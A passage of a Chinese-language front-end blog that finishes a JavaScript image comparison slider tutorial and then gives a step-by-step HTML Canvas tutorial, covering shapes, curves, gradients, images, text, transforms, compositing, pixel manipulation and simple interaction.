    this.rightImage.style.clipPath = 'inset(0 0 0 ' + widthPercent + '%)';

    // 添加触摸事件监听器
    this.mask.addEventListener('touchstart', (e) => {
    this.isDragging = true;
    e.preventDefault(); // 阻止默认事件(如滚动)
    });
    document.addEventListener('touchend', () => {
    this.isDragging = false;
    });
    document.addEventListener('touchmove', (e) => {
    if (this.isDragging) {
    this.touchDrag(e);
    }
    });

    // 添加鼠标事件监听器
    this.mask.addEventListener('mousedown', (e) => {
    this.isDragging = true;
    e.preventDefault(); // 阻止默认事件(如选择文本)
    });
    document.addEventListener('mouseup', () => {
    this.isDragging = false;
    });
    document.addEventListener('mousemove', (e) => {
    if (this.isDragging) {
    this.drag(e);
    }
    });
    }

    // 触摸拖动事件处理函数
    touchDrag(e) {
    var rect = this.mask.parentNode.getBoundingClientRect();
    var x = e.touches[0].clientX - rect.left; // 获取触摸点相对于容器的位置
    var widthPercent = (x / rect.width) * 100;
    widthPercent = Math.min(Math.max(widthPercent, 0.5), 99.5);
    this.mask.style.left = (widthPercent - 0.5) + '%';
    this.leftImage.style.clipPath = 'inset(0 ' + (100 - widthPercent) + '% 0 0)';
    this.rightImage.style.clipPath = 'inset(0 0 0 ' + widthPercent + '%)';
    }

    // 鼠标拖动事件处理函数
    drag(e) {
    var rect = this.mask.parentNode.getBoundingClientRect();
    var x = e.clientX - rect.left; // 获取鼠标相对于容器的位置
    var widthPercent = (x / rect.width) * 100;
    widthPercent = Math.min(Math.max(widthPercent, 0.5), 99.5);
    this.mask.style.left = (widthPercent - 0.5) + '%';
    this.leftImage.style.clipPath = 'inset(0 ' + (100 - widthPercent) + '% 0 0)';
    this.rightImage.style.clipPath = 'inset(0 0 0 ' + widthPercent + '%)';
    }
    }

    function createImageSlider(sliderId, widthPercent=50) {
    const slider = document.getElementById(sliderId);
    const mask = slider.querySelector('.mask');
    const leftImage = slider.querySelector('.left-image');
    const rightImage = slider.querySelector('.right-image');
    return new ImageSlider(mask, leftImage, rightImage, widthPercent);
    }

    Html

    ​ 导入 css 和 js:

    1
    2
    <link rel="stylesheet" type="text/css" href="./slider.css">
    <script type="text/javascript" src="./slider.js"></script>

    ​ 使用这个效果:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19

    <div class="slider" id="slider1">
    <img class="left-image" src="left_1.jpg" alt="jpg" />
    <img class="right-image" src="right_1.jpg" alt="jpg" />
    <div class="mask"></div>
    </div>

    <script>createImageSlider('slider1', 67.5);</script>

    ...

    <div class="slider" id="slidern">
    <img class="left-image" src="left_n.jpg" alt="jpg" />
    <img class="right-image" src="right_n.jpg" alt="jpg" />
    <div class="mask"></div>
    </div>

    <script>createImageSlider('slidern', 48.5);</script>

    演示

    ​ 拿出珍藏私货!


    jpg jpg
    jpg jpg
    jpg jpg
    jpg jpg
    jpg jpg
    jpg jpg
    jpg jpg
    jpg jpg
    jpg jpg
    ]]>
    @@ -3729,7 +3729,7 @@ /posts/Web-Html%20Canvas/ - 资源

    正文

    01-初识 Canvas

    • 创建一个 canvas:
    <canvas id="c" width="600" height="400"></canvas>
    • 一个 canvas 画布一般包含三要素:

      • id: 标识元素的唯一性

      • width: 画布的宽度

      • height: 画布的高度

    • 在 Canvas 上画画:

      • 找到 ID 为 c 的画布:
    var c = document.getElementById('c')
    • 获取画笔,上下文对象:
    var ctx = c1.getContext('2d');
    • 绘制矩形:fillRect (位置 x, 位置 y, 宽度, 高度)
    ctx.fillRect(100, 100, 100, 100);

    • 完整代码:
    <!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    </head>
    <body>
    <!--
    id: 标识元素的唯一性
    width: 画布的宽度
    height: 画布的高度
    -->
    <canvas id="c" width="600" height="400"></canvas>
    <script>
    // 1. 找到画布
    var c = document.getElementById('c')
    // 2. 获取画笔,上下文对象
    var ctx = c1.getContext('2d');
    // 3. 绘制图形
    // 3.1 绘制矩形 fillRect(位置 x, 位置 y, 宽度, 高度)
    ctx.fillRect(100, 100, 100, 100);
    </script>
    </body>
    </html>
    • 最终效果:

    png

    02-canvas上下文对象与浏览器支持

    • 对于不适应 canvas 的浏览器,c.getContext 将会返回空,可以输出提示信息:
    // 判断是否有 getContext
    if(!c.getContext)
    {
    console.log("当前浏览器不支持 canvas,请下载最新的浏览器");
    }
    • 如果不适应 canvas,canvas 里的内容就不会被覆盖,就可以操作一番:
    <canvas id="c" width="600" height="400">
    当前浏览器不支持 canvas,请下载最新的浏览器
    <a href="https://www.google.cn/chrome/index.html">立即下载</a>
    </canvas>
    • 画笔有很多属性,console.log(ctx); 输出它们:

    png


    • 完整代码:
    <!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    </head>
    <body>
    <!--
    id: 标识元素的唯一性
    width: 画布的宽度
    height: 画布的高度
    -->
    <canvas id="c" width="600" height="400">
    当前浏览器不支持 canvas,请下载最新的浏览器
    <a href="https://www.google.cn/chrome/index.html">立即下载</a>
    </canvas>
    <script>
    // 1. 找到画布
    var c = document.getElementById('c')
    // 判断是否有 getContext
    if(!c.getContext)
    {
    console.log("当前浏览器不支持 canvas,请下载最新的浏览器");
    }
    // 2. 获取画笔,上下文对象
    var ctx = c1.getContext('2d');
    console.log(ctx);
    // 3. 绘制图形
    // 3.1 绘制矩形 fillRect(位置 x, 位置 y, 宽度, 高度)
    ctx.fillRect(100, 100, 100, 100);
    </script>
    </body>
    </html>

    03-Canvas 填充与路径绘制

    • 在 canvas 中,如果 style 属性设置了大小,则这个画布在网页上的最终显示将会进行拉伸变换。(但是一般是设置相同的)
    <canvas id="c" width="600" height="400" style="width: 200px; height: 200px;"></canvas>

    png


    • 之前使用 ctx.fillRect() 会生成自带填充的矩形,而使用 ctx.strokeRect() 则会以路径形式绘制矩形。
      • strokeRect(x1, y1, 矩形宽度,矩形高度)
        • x1 为矩形左上角的点到画布左上角 x 轴的距离
        • y1 为矩形左上角的点到画布左上角 y 轴的距离
    // 3. 绘制图形
    // 3.2 路径绘制矩形 strokeRect(x1, y1, 矩形宽度,矩形高度)
    ctx.strokeRect(100, 200, 200, 100);

    png


    • 清除画布范围内的矩形:
    ctx.clearRect(0, 0, c1.clientWidth, c1.clientHeight);

    ctx.strokeRect(100, 200, 200, 100);
    ctx.fillRect(200, 150, 200, 100);
    let height = 0;
    let t1 = setInterval(() => {
    height++;
    ctx.clearRect(0, 0, c1.clientWidth, height);
    if (height > c1.clientHeight)
    {
    clearInterval(t1);
    }
    }, 10);

    • 定义矩形,但不绘制:
    ctx.rect(100, 200, 300, 300);
    • 填充所定义的矩形:
    ctx.fill();
    • 描边所定义的矩形:
    ctx.stroke();

    • ctx.beginPath();ctx.closePath(); 分别表示提笔和抬笔操作,这样绘制的时候不会覆盖之前定义的图形。(有种 Windows 程序设计的味道)
    ctx.beginPath();
    ctx.rect(200, 150, 200, 100);
    ctx.stroke();
    ctx.closePath();

    ctx.beginPath();
    ctx.rect(100, 200, 200, 100);
    ctx.fill();
    ctx.closePath();

    04-canvas绘制圆弧与笑脸

    • arc 是绘制圆弧的方法。
    • ctx.arc(圆心x, 圆心y, 半径, 开始的角度, 结束的角度, 逆时针(true)还是顺时针(false));
    ctx.arc(300, 200, 50, 0, Math.PI / 4);
    ctx.stroke();
    • 使用圆弧工具绘制一个笑脸,记得要分别使用 ctx.beginPath();ctx.closePath(); 提笔和抬笔,不然路径会相连。
    // 绘制一张脸
    ctx.beginPath();
    ctx.arc(75, 75, 50, 0, Math.PI * 2);
    ctx.stroke();
    ctx.closePath();
    // 绘制嘴巴
    ctx.beginPath();
    ctx.arc(75, 75, 35, 0, Math.PI);
    ctx.stroke();
    ctx.closePath();
    // 绘制嘴巴
    ctx.beginPath();
    ctx.arc(60, 65, 5, 0, Math.PI * 2);
    ctx.stroke();
    ctx.closePath();
    // 绘制右眼
    ctx.beginPath();
    ctx.arc(90, 65, 5, 0, Math.PI * 2);
    ctx.stroke();
    ctx.closePath();

    • 上述方法代码太繁琐,改用 moveTo 来移动点。
    ctx.beginPath();
    // 绘制一张脸
    ctx.arc(75, 75, 50, 0, Math.PI * 2);
    ctx.moveTo(110, 75);
    // 绘制嘴巴
    ctx.arc(75, 75, 35, 0, Math.PI);
    ctx.moveTo(65, 65);
    // 绘制嘴巴
    ctx.arc(60, 65, 5, 0, Math.PI * 2);
    ctx.moveTo(95, 65);
    // 绘制右眼
    ctx.arc(90, 65, 5, 0, Math.PI * 2);
    ctx.stroke();
    ctx.closePath();

    • 最终效果:

    05-绘制折线线段

    ctx.moveTo(300, 200);
    ctx.lineTo(350, 250);
    • 将画笔移动到 (300, 200),然后划线至 (350, 250)

    • 范例:
    ctx.beginPath();
    ctx.moveTo(300, 200);
    ctx.lineTo(350, 250);
    ctx.lineTo(350, 200);
    ctx.lineTo(300, 200);
    ctx.stroke();
    ctx.closePath();

    ctx.beginPath();
    ctx.moveTo(200, 100);
    ctx.lineTo(250, 150);
    ctx.lineTo(250, 100);
    ctx.lineTo(200, 100);
    ctx.fill();
    ctx.closePath();
    • 最终效果:

    06-actTo 绘制圆弧方式

    • actTo,用 3 个点控制一段圆弧。

    png

    ctx.beginPath();
    // 第 1 个点
    ctx.moveTo(300, 200);
    // 第 2 个点和第 3 个点,以及圆弧的半径
    ctx.arcTo(300, 250, 250, 250, 50);
    ctx.stroke();
    ctx.closePath();

    png

    07-二次贝塞尔曲线实现聊天气泡框


    png

    • 开始点:moveTo(20,20)
    • 控制点:quadraticCurveTo(20,100,200,20)
    • 结束点:quadraticCurveTo(20,100,200,20)

    • 使用二次贝塞尔曲线画一个聊天气泡框:
    ctx.beginPath();
    ctx.moveTo(200, 300);
    ctx.quadraticCurveTo(150, 300, 150, 200);
    ctx.quadraticCurveTo(150, 100, 300, 100);
    ctx.quadraticCurveTo(450, 100, 450, 200);
    ctx.quadraticCurveTo(450, 300, 250, 300);
    ctx.quadraticCurveTo(250, 350, 150, 350);
    ctx.quadraticCurveTo(200, 350, 200, 300);
    ctx.stroke();
    ctx.closePath();

    png

    08-三次贝塞尔曲线实现献给朋友的爱心


    • 代码:
    ctx.beginPath();
    ctx.moveTo(300, 200);
    ctx.bezierCurveTo(350, 150, 400, 200, 300, 250);
    ctx.bezierCurveTo(200, 200, 250, 150, 300, 200);
    ctx.stroke();
    ctx.closePath();

    png

    09-封装路径Path2d

    • 将之前所画的心形封装成一个路径:
    var heartPath = new Path2D();
    heartPath.moveTo(300, 200);
    heartPath.bezierCurveTo(350, 150, 400, 200, 300, 250);
    heartPath.bezierCurveTo(200, 200, 250, 150, 300, 200);
    ctx.stroke(heartPath);
    • 或是使用 svg 字符串创建一个路径:
    var polyline = new Path2D("M10 10 h 80 v 80 h -80 z");
    ctx.stroke(polyline);
    • 最终效果:

    10-颜色样式控制

    • ctx.strokeStyle = ""ctx.fillStyle = "" 分别设置描边和填充样式。
      • ”red“ 预设颜色。
      • "#ff00ff" 16 进制颜色。
      • rgb(255, 0, 0) RGB 颜色。
      • rgba(200, 200, 255) RGBA 颜色。
    • ctx.globalAlpha = 0.5; 设置全局透明度。

    • 演示效果:

    11-线型渐变和径向渐变


    • 线性渐变:
    let lineGradient = ctx.createLinearGradient(100, 200, 400, 500);
    lineGradient.addColorStop(0, "red");
    lineGradient.addColorStop(0.3, "#ffcccc");
    lineGradient.addColorStop(1, "blue");
    ctx.fillStyle = lineGradient;
    ctx.fillRect(100, 200, 300, 300);

    png


    • 线性渐变动画:
    let index = 0;

    function render()
    {
    ctx.clearRect(0, 0, 600, 400);
    index += 0.01;
    if (index > 1)
    {
    index = 0;
    }
    let linearGradient = ctx.createLinearGradient(100, 200, 400, 500);
    linearGradient.addColorStop(0, "red");
    linearGradient.addColorStop(index, "#ffcccc");
    linearGradient.addColorStop(1, "blue");
    ctx.fillStyle = linearGradient;
    ctx.fillRect(100, 200, 300, 300);
    requestAnimationFrame(render);
    }

    requestAnimationFrame(render);

    let radiaGradient = ctx.createRadialGradient(300, 200, 0, 300, 200, 100);
    radiaGradient.addColorStop(0, "red");
    radiaGradient.addColorStop(0.3, "#ffcccc");
    radiaGradient.addColorStop(1, "blue");
    ctx.fillStyle = radiaGradient;

    ctx.fillRect(0, 0, 600, 400);

    png


    • 径向渐变画个球:
    let radiaGradient = ctx.createRadialGradient(250, 150, 10, 300, 200, 100);
    radiaGradient.addColorStop(0, "#ffcccc");
    radiaGradient.addColorStop(1, "red");
    ctx.fillStyle = radiaGradient;

    ctx.arc(300, 200, 100, 0, Math.PI * 2);
    ctx.fill();

    png

    12-圆锥渐变特效

    // 圆锥渐变 createConicGradient(角度, 位置 x, 位置 y)
    let coneGradient = ctx.createConicGradient(Math.PI / 4, 300, 200);
    coneGradient.addColorStop(0, "red");
    coneGradient.addColorStop(0.5, "yellow");
    coneGradient.addColorStop(1, "blue");
    ctx.fillStyle = coneGradient;
    ctx.fillRect(0, 0, 600, 400);

    13-pattern 印章填充样式

    • createPattern(图片对象,重复方式);
      • 图片对象(可以是 image 对象,也可以是 canvas 对象)
      • 重复方式 repeat, no-repeat, repeat-x, repeat-y
    var img = new Image();
    img.src = "./imgs/money.png"

    img.onload = function(){
    // 创建图案对象 createPattern(图片对象,重复方式)
    var pattern = ctx.createPattern(img, "repeat");
    ctx.fillStyle = pattern;
    ctx.fillRect(0, 0, 600, 400);
    }

    14-线段和虚线样式设置

    var c = document.getElementById('c')
    var ctx = c.getContext('2d');

    ctx.moveTo(200, 150);
    ctx.lineTo(300, 200);
    ctx.lineTo(400, 150);
    // 设置线条样式,默认 1px
    ctx.lineWidth = 40;
    // 设置线条端点样式,butt 平齐,round 半圆,正方形: square
    ctx.lineCap = "square";
    // 设置 2 个线段连接处的样式,mitter 外侧相连的角,round 角被磨圆了。
    ctx.lineJoin = "round";
    ctx.stroke();

    png


    var c = document.getElementById('c')
    var ctx = c.getContext('2d');

    ctx.moveTo(290, 150);
    ctx.lineTo(300, 200);
    ctx.lineTo(310, 150);
    // 设置线条样式,默认 1px
    ctx.lineWidth = 40;
    // 设置线条端点样式,butt 平齐,round 半圆,正方形: square
    ctx.lineCap = "square";
    // 设置 2 个线段连接处的样式,mitter 外侧相连的角,round 角被磨圆了。
    ctx.lineJoin = "mitter";
    // 对斜截面进行限制
    ctx.miterLimit = 5;
    ctx.stroke();

    png

    var c = document.getElementById('c')
    var ctx = c.getContext('2d');

    ctx.moveTo(150, 150);
    ctx.lineTo(300, 200);
    ctx.lineTo(450, 150);
    // 设置线条样式,默认 1px
    ctx.lineWidth = 2;
    // 设置线条端点样式,butt 平齐,round 半圆,正方形: square
    ctx.lineCap = "square";
    // 设置 2 个线段连接处的样式,mitter 外侧相连的角,round 角被磨圆了。
    ctx.lineJoin = "mitter";
    // 对斜截面进行限制
    ctx.miterLimit = 5;
    // 设置虚线
    ctx.setLineDash([40, 20]);
    ctx.lineDashOffset = 10;
    ctx.stroke();
    • ctx.setLineDash([40, 20]) 方法会设置线条的虚线样式,其中数组中的数字表示虚线和实线的长度(单位为像素)。在本例中,[40, 20] 表示先绘制长度为 40 的实线,再跳过长度为 20 的空白,然后重复这个过程。因此,这段代码将绘制一个由实线和空白组成的虚线。

    • ctx.lineDashOffset = 10 则是设置虚线的偏移量。这个属性可以改变虚线起始点的位置。

    png


    var c = document.getElementById('c')
    var ctx = c.getContext('2d');
    let index = 0;

    function render(){
    ctx.clearRect(0, 0, 600, 400);
    index++;
    if (index > 40) {
    index = 0;
    }
    ctx.moveTo(150, 150);
    ctx.lineTo(300, 200);
    ctx.lineTo(450, 150);
    // 设置线条样式,默认 1px
    ctx.lineWidth = 2;
    // 设置线条端点样式,butt 平齐,round 半圆,正方形: square
    ctx.lineCap = "square";
    // 设置 2 个线段连接处的样式,mitter 外侧相连的角,round 角被磨圆了。
    ctx.lineJoin = "mitter";
    // 对斜截面进行限制
    ctx.miterLimit = 5;
    // 设置虚线
    ctx.setLineDash([40, 20]);
    ctx.lineDashOffset = index;
    ctx.stroke();
    requestAnimationFrame(render);
    }
    render();

    15-canvas 阴影设置

    • 核心代码:
    // 设置阴影
    ctx.shadowOffsetX = 10;
    ctx.shadowOffsetY = 10;
    ctx.shadowBlur = 5;
    ctx.shadowColor = "rgba(255, 100, 100, 1)";
    • 完整代码:
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度

    // 设置阴影
    ctx.shadowOffsetX = 10;
    ctx.shadowOffsetY = 10;
    ctx.shadowBlur = 5;
    ctx.shadowColor = "rgba(255, 100, 100, 1)";

    ctx.globalAlpha = 0.5;
    // 起点
    var heartPath = new Path2D();
    heartPath.moveTo(300, 200);// 2个控制点、1个终点
    heartPath.bezierCurveTo(350, 150, 400, 200, 300, 250);
    heartPath.bezierCurveTo(200, 200, 250, 150, 300, 200);
    ctx.strokeStyle = "red"
    ctx.stroke(heartPath);

    var chatPath = new Path2D();
    chatPath.moveTo(200, 300);
    chatPath.quadraticCurveTo(150, 300, 150, 200);
    chatPath.quadraticCurveTo(150, 100, 300, 100);
    chatPath.quadraticCurveTo(450, 100, 450, 200);
    chatPath.quadraticCurveTo(450, 300, 250, 300);
    chatPath.quadraticCurveTo(250, 350, 150, 350);
    chatPath.quadraticCurveTo(200, 350, 200, 300);
    ctx.strokeStyle = "#ff00ff";

    ctx.stroke(chatPath);
    ctx.fillStyle = "rgba(255,200,200,0.3)";
    ctx.fill(heartPath);
    // 创建一条折线
    var polyline = new Path2D("M10 10 h 80 v 80 h -80 z");
    ctx.strokeStyle = "rgba(0,0,255)";

    ctx.stroke(polyline);

    png

    16-canvas 绘制图片的三种模式

    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度

    // 获取图片
    let img = new Image();
    img.src = "./imgs/girl.webp";
    img.onload = function (){
    // 第一种方式绘制,(图片对象,水平位置,垂直位置)
    // ctx.drawImage(img, 0, 0);
    // 第二种方式绘制,能够缩放图片(图片对象,水平位置,垂直位置,缩放到对应宽度,缩放到对应高度)
    ctx.drawImage(img, 0, 0, 600, 400);
    // 第三种方式绘制,能够裁剪图片,img 参数后面的四个参数分别为源图片上面你要裁剪的起点位置和矩形的宽高,后面四个参数分别为画布的位置和要渲染的矩形的宽高
    ctx.drawImage(img, 640, 0, 1280, 720, 0, 0, 600, 400);
    }

    17-canvas 绘制动态视频并添加水印

    <video src="./imgs/mov_bbb.mp4" controls></video>
    • <video> 组件可以在网页中显示视频。

    可以把视频里的帧放入 canvas 中,还可以在视频上叠加水印。

    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    </head>
    <body>
    <canvas id="c" width="600" height="400"></canvas>
    <video style="display: none;" src="./imgs/mov_bbb.mp4" controls></video>
    <button id="btn">播放 / 暂停</button>
    <script>
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度

    // 获取视频对象
    var video = document.querySelector("video");

    // 获取按钮
    let btn = document.querySelector("#btn");
    btn.onclick = function(){
    video.play();
    render();
    }

    // logo 图片对象
    let img = new Image();
    img.src = "./imgs/logo.png";

    function render(){
    ctx.drawImage(video, 0, 0, 600, 400);
    ctx.drawImage(img, 400, 350, 200, 50);
    requestAnimationFrame(render);
    }
    </script>
    </body>

    18-文字绘制与对齐

    • 绘制文字颜色
    ctx.strokeStyle = "#f00";
    • 设置文字大小与字体
    ctx.font = "100px Microsoft YaHei";
    • 填充渲染文字
      • fillText(文本, 文本的起点 x 坐标, 文本的起点 y 坐标, 绘制文字的最大宽度)
    ctx.fillText("你好", 300, 200);
    • 文本对齐选项 textAlign, start(默认), end, left, right, center
    ctx.textAlign = "center";
    • 文本基线对齐,textBaseline, top, bottom, alphabetic
    ctx.textBaseline = "middle";
    • 文本的方向
    ctx.direction = "rtl";
    • 预测量文本宽度
    let text = ctx.measureText("你好!");
    console.log(text);
    • 绘制文本边框
    ctx.strokeText("你好!", 300, 200);
    • 完整代码
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度
    // 文字,大小 / 字体
    ctx.strokeStyle = "#f00";
    ctx.font = "100px Microsoft YaHei";
    // 填充渲染文字
    // fillText(文本, 文本的起点 x 坐标, 文本的起点 y 坐标, 绘制文字的最大宽度)
    // ctx.fillText("你好", 300, 200);
    // 文本对齐选项 textAlign, start(默认), end, left, right, center
    ctx.textAlign = "center";
    // 文本基线对齐,textBaseline, top, bottom, alphabetic
    ctx.textBaseline = "middle";
    // 文本的方向
    ctx.direction = "rtl";
    // 预测量文本宽度
    let text = ctx.measureText("你好!");
    console.log(text);
    ctx.strokeText("你好!", 300, 200);
    ctx.arc(300, 200, 5, 0, 2 * Math.PI);
    ctx.fill();

    png

    19-位移_缩放_旋转变换

    • ctx.translate(100, 100);
      • 让坐标系原点向左和向下移动 100px。
    • ctx.rotate(Math.PI / 6);
      • 逆时针旋转坐标系 30°
    • ctx.scale(5, 2);
      • 让坐标系分别沿 x 轴和 y 轴缩放 5 倍和 2 倍。

    • 完整代码:
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度
    // 3. 绘制图形
    // 3.1 绘制图形 fillRect(位置 x, 位置 y, 宽度, 高度)
    ctx.translate(100, 100);
    // scale 拉伸坐标系
    ctx.rotate(Math.PI / 6);
    ctx.scale(5, 2);
    ctx.fillRect(0, 0, 50, 50);
    ctx.translate(100, 100);
    ctx.fillRect(0, 0, 50, 50);

    png

    20-transform 使用矩阵完成图像变换操作

    • transform(a, b, c, d, e, f),直接对变形矩阵进行修改:
      • $\begin{bmatrix} a & c & e \ b & d & f \ 0 & 0 & 1 \end{bmatrix}$
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度
    // 3. 绘制图形
    // transform 进行位移,水平坐标轴不变,1, 0, 竖直坐标轴不变 0, 1
    ctx.transform(1, 1, -1, 1, 50, 0);
    ctx.fillRect(0, 0, 500, 50);

    png

    21-canvas 合成图像模式

    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度
    // 3. 绘制图形
    ctx.fillStyle = "#F00";
    ctx.fillRect(300, 200, 100, 100);
    ctx.globalCompositeOperation = "source-in"
    ctx.fillStyle = "#00F";
    ctx.fillRect(250, 150, 100, 100);

    png

    22-合成图像实现刮刮卡

    #ggk{
    width: 600px;
    height: 400px;
    font-size: 30px;
    font-weight: 900;
    text-align: center;
    line-height: 400px;
    overflow: hidden;
    position: absolute;
    left: 0;
    top: 0;
    }
    <div id="ggk">谢谢惠顾</div>
    <canvas style="position: absolute; border: 1px solid #ccc; z-index: 2;" id="c" width="600" height="400"></canvas>
    • 使用 <canvas> 盖住刮刮卡背后的文字。

    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度
    // 3. 绘制图形
    let img = new Image();
    img.src = "./imgs/m2.png";
    img.onload = function(){
    ctx.drawImage(img, 0, 0, 600, 400);
    }
    var isDraw = false;
    c.onmousedown = function(){
    isDraw = true;
    }
    c.onmouseup = function(){
    isDraw = false;
    }
    c.onmousemove = function (e) {
    if (isDraw) {
    var x = e.pageX;
    var y = e.pageY;

    ctx.globalCompositeOperation = "destination-out";

    ctx.arc(x, y, 20, 0, 2 * Math.PI);
    ctx.fill();
    }
    };

    let random = Math.random();
    if (random < 0.1) {
    var ggkDiv = document.querySelector("#ggk");
    ggkDiv.innerHTML = "恭喜您获得 IPHONE14 PRO 大奖!";
    }
    • 通过按下鼠标并移动在鼠标的位置画圆实现刮刮卡的效果。

    • ctx.globalCompositeOperation = "destination-out"; 将圆形和遮罩重叠的部分设为透明。


    • 最终效果:

    23-裁剪路径

    ​ 裁切路径和普通的 canvas 图形差不多,不同的是它的作用是遮罩,用来隐藏不需要的部分。所有在路径以外的部分都不会在canvas 上绘制出来。

    • clip() 将当前构建的路径转换为当前的裁剪路径。
    // 1. 找到画布
    var c = document.getElementById('c')
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度
    // 起点
    var heartPath = new Path2D();
    heartPath.moveTo(300, 200);// 2个控制点、1个终点
    heartPath.bezierCurveTo(350, 150, 400, 200, 300, 250);
    heartPath.bezierCurveTo(200, 200, 250, 150, 300, 200);
    ctx.stroke(heartPath);
    var chatPath = new Path2D();
    chatPath.moveTo(200, 300);
    chatPath.quadraticCurveTo(150, 300, 150, 200);
    chatPath.quadraticCurveTo(150, 100, 300, 100);
    chatPath.quadraticCurveTo(450, 100, 450, 200);
    chatPath.quadraticCurveTo(450, 300, 250, 300);
    chatPath.quadraticCurveTo(250, 350, 150, 350);
    chatPath.quadraticCurveTo(200, 350, 200, 300);
    ctx.clip(chatPath);
    ctx.fill(heartPath);

    // 获取图片
    let img = new Image();
    img.src = "./imgs/girl.webp";
    img.onload = function (){
    // 第一种方式绘制,(图片对象,水平位置,垂直位置)
    // ctx.drawImage(img, 0, 0);
    // 第二种方式绘制,能够缩放图片(图片对象,水平位置,垂直位置,缩放到对应宽度,缩放到对应高度)
    ctx.drawImage(img, 0, 0, 600, 400);
    // 第三种方式绘制,能够裁剪图片,img 参数后面的四个参数分别为源图片上面你要裁剪的起点位置和矩形的宽高,后面四个参数分别为画布的位置和要渲染的矩形的宽高
    ctx.drawImage(img, 640, 0, 1280, 720, 0, 0, 600, 400);
    // 给对话框描边
    ctx.lineWidth = 20;
    ctx.stroke(chatPath);
    }

    png

    24-状态的保存和恢复

    • save() 将当前状态压入一个栈中。
    • restore() 从栈中取出一个状态并应用之。
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度
    // 3. 绘制图形
    ctx.fillStyle = "red";
    ctx.fillRect(0, 0, 100, 100);
    ctx.save();

    ctx.fillStyle = "blue";
    ctx.fillRect(100, 100, 100, 100);
    ctx.save();

    ctx.fillStyle = "yellow";
    ctx.fillRect(200, 200, 100, 100);
    ctx.save();

    ctx.fillStyle = "green";
    ctx.fillRect(300, 300, 100, 100);
    ctx.save();

    ctx.restore();
    ctx.fillRect(400, 400, 100, 100);

    ctx.restore();
    ctx.fillRect(500, 500, 100, 100);

    ctx.restore();
    ctx.fillRect(600, 600, 100, 100);

    ctx.restore();
    ctx.fillRect(700, 700, 100, 100);

    png

    25-像素操作

    png

    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度

    // 获取图片
    let img = new Image();
    img.src = "imgs/girl.webp";
    img.onload = function (){
    ctx.drawImage(img, 0, 0, 600, 400);

    let imageData = ctx.getImageData(0, 0, 600, 400);
    console.log(imageData);
    // 循环修改数据
    for (let i = 0; i < imageData.data.length; i+= 4)
    {
    let gray = imageData.data[i] * 0.3 + imageData.data[i + 1] * 0.59 + imageData.data[i + 2] * 0.11;
    imageData.data[i] = gray;
    imageData.data[i + 1] = gray;
    imageData.data[i + 2] = gray;
    imageData.data[i + 3] = 255;
    }
    ctx.putImageData(imageData, 0, 0, 0, 0, 300, 400);
    }

    png

    26-高级封装绘制元素和实现元素交互

    • 这节大概是讲怎么应用面向对象的思想吧……

    • Javascript 创建一个 Heart 类,并设计 constructor() 构造函数,使用 draw() 绘制图案。
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度

    class Heart{
    constructor(x, y){
    this.x = x;
    this.y = y;
    this.heartPath = new Path2D();
    this.heartPath.moveTo(this.x, this.y);
    this.heartPath.bezierCurveTo(
    this.x + 50,
    this.y - 50,
    this.x + 100,
    this.y,
    this.x,
    this.y + 50
    );
    this.heartPath.bezierCurveTo(
    this.x - 100,
    this.y,
    this.x - 50,
    this.y - 50,
    this.x,
    this.y
    );
    }
    draw(){
    ctx.save();
    ctx.fillStyle = "red";
    ctx.fill(this.heartPath);
    ctx.restore();
    }
    }
    let heart = new Heart(100, 100);
    heart.draw();
    • 设计一下 onmousemove() 让用户在鼠标移向图案的时候,图案变色:
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度

    class Heart{
    constructor(x, y){
    this.x = x;
    this.y = y;
    this.color = "red";
    this.heartPath = new Path2D();
    this.heartPath.moveTo(this.x, this.y);
    this.heartPath.bezierCurveTo(
    this.x + 50,
    this.y - 50,
    this.x + 100,
    this.y,
    this.x,
    this.y + 50
    );
    this.heartPath.bezierCurveTo(
    this.x - 100,
    this.y,
    this.x - 50,
    this.y - 50,
    this.x,
    this.y
    );
    c.onmousemove = (e) => {
    let x = e.offsetX;
    let y = e.offsetY;
    let isIn = ctx.isPointInPath(this.heartPath, x, y);
    if (isIn)
    {
    this.color = "blue";
    }else{
    this.color = "red";
    }
    }
    }
    draw(){
    ctx.save();
    ctx.fillStyle = this.color;
    ctx.fill(this.heartPath);
    ctx.restore();
    }
    }
    let heart = new Heart(100, 100);
    function render(){
    ctx.clearRect(0, 0, c.width, c.height);
    heart.draw();
    requestAnimationFrame(render);
    }
    render();

    更牛逼的写法……emmm 学不来。

